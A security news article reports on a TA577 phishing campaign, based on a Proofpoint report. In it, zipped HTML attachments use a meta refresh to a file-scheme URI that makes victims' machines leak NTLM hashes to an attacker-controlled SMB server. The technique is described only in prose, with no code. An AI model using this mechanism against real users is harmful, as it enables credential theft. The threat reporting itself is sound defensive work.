Malicious email campaign steals NTLM hashes

A threat group that acts as an initial access broker is targeting organizations with rogue email attachments that steal Microsoft Windows NT LAN Manager (NTLM) authentication information when opened. The group’s campaigns last week targeted hundreds of entities with thousands of email messages, researchers warn.

NTLM is the default authentication mechanism that’s used on Windows networks when a computer tries to access various network resources or services, for example file shares over the SMB protocol. NTLM credentials are not sent in the clear but as a cryptographic hash, but there are ways to potentially recover the passwords from such hashes depending on how complex the passwords are or to use the hashes directly in attacks.

“Proofpoint typically observes TA577 conducting attacks to deliver malware and has never observed this threat actor demonstrating the attack chain used to steal NTLM credentials first observed on 26 February,” researchers from security firm Proofpoint said in a report. “Recently, TA577 has been observed delivering Pikabot using a variety of attack chains.”

Thread hijacking leads to rogue HTML files

TA577, also tracked in the security industry as Hive0118, is a financially motivated access broker with a long history of distributing trojan programs. The group used to be one of the main affiliates for the Qbot botnet before it was disrupted, but has also been observed distributing malware programs such as IcedID, SystemBC, SmokeLoader, Ursnif, Cobalt Strike, and more recently Pikabot.

Since the group sells access to computers to other cybercriminal gangs, the systems compromised by TA577 have had follow-on ransomware infections, most notably with Black Basta. TA577 also specializes in a technique known as thread hijacking where their rogue email messages are crafted to appear as replies to previously sent legitimate emails. The latest campaigns seen by Proofpoint used messages in which recipients were asked if they had time to look at a document sent previously.

The emails contained a .zip archive together with a password needed to unpack it. The archive in turn contained an innocuous looking HTML document that was customized for each victim. When opened, the HTML automatically triggers a connection attempt to a remote SMB server controlled by attackers via a meta refresh in the file that points to a file scheme URI ending in .txt.

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button